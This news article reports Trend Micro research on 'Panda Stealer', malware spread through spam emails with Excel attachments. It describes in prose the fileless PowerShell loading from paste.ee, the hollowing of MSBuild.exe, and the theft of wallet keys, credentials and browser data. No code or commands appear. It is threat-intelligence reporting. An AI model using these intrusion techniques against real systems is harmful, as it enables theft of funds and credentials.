'Panda Stealer' Targets Cryptocurrency WalletsMalware Spread Through Spam Email Campaign
Researchers at Trend Micro have uncovered a new cryptocurrency stealer variant that uses a fileless approach in its global spam email distribution campaign to evade detection.
The gang behind the malware, dubbed "Panda Stealer," starts with emails that appear to be business quote requests to entice recipients to open malicious Excel files, Trend Micro says.
Researchers found that the malware, a modification of Collector Stealer, has targeted victims in the United States, Australia, Japan and Germany.
Trend Micro identified two infection chains. One uses an .XLSM attachment that contains macros that download a loader, which then downloads and executes the main stealer.
The second infection chain method involves an attached .XLS file containing an Excel formula that uses a PowerShell command to access paste.ee, a Pastebin alternative, which accesses a second encrypted PowerShell command.
"Decoding these PowerShell scripts revealed that they are used to access paste.ee URLs for easy implementation of fileless payloads. The CallByName export function in Visual Basic is used to call the loading of a .NET assembly within memory from a paste.ee URL. The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL," according to the Trend Micro researchers.
Once it's installed on a device, Panda Stealer can collect private keys and records of past transactions from victim’s digital currency wallets, including Dash, Bytecoin, Litecoin and Ethereum.
"Not only does it target cryptocurrency wallets, it can steal credentials from other applications, such as NordVPN, Telegram, Discord chat app and Steam," the researchers note. "It’s also capable of taking screenshots of the infected computer and exfiltrating data from browsers, like cookies, passwords and cards."
After stealing information, the malware stores stolen files in a %TEMP% folder under random file names. The files are then sent to a command-and-control server. Further analysis of the C2 revealed a login page for “Panda Stealer,” Check Point reports.
"But more domains have been identified with the same login page," the researchers say. "Another 14 victims were discovered from the logs of one of these servers. Another 264 files similar to Panda Stealer were found on VirusTotal. More than 140 C2 servers and over 10 download sites were used by these samples.”
Some of the download sites were from Discord, researchers say. They report that these contain files with names such as "build.exe." indicating that threat actors may be using Discord to share the Panda Stealer build.
Trend Micro researchers identified an IP address that the attackers apparently used.
"We believe that this address is assigned to a virtual private server rented from Shock Hosting, which the actor infected for testing purposes," the researchers note. "The VPS may be paid for using cryptocurrency to avoid being traced and uses the online service Cassandra Crypter. We have reported this to Shock Hosting, and they confirmed that the server assigned to this IP address has been suspended."
Researchers also discovered an infected device with a history of visiting a Google Drive link, which is also mentioned in a discussion about AZORult log extractor on an underground forum.
"The same link and unique cookie were observed on both the log dumps and the forum, therefore the user who posted on the forum must also have access to that log file," the researchers note.
A Variant of Collector Stealer
Trend Micro says that Panda Stealer is a variant of Collector Stealer, which is sold on some underground forums and a Telegram channel. Collector Stealer has been cracked by a Russian threat actor called NCP, also known as su1c1de, the researchers say.
"Comparing the compiled executables of the cracked Collector Stealer and Panda Stealer shows that the two behave similarly, but have different C2 URLs, build tags, and execution folders," Trend Micro reports. "Like Panda Stealer, Collector Stealer exfiltrates information such as cookies, login data, and web data from a compromised computer, storing them in an SQLite3 database. It also covers its tracks by deleting its stolen files and activity logs after its execution."
A Collector Stealer builder is openly accessible online, and it can be used to create a customized version, the researchers say.
"Threat actors may also augment their malware campaigns with specific features from Collector Stealer. We have also discovered that Panda Stealer has an infection chain that uses the same fileless distribution method as the "Fair" variant of Phobos ransomware to carry out memory-based attacks, making it more difficult for security tools to spot," the researchers note.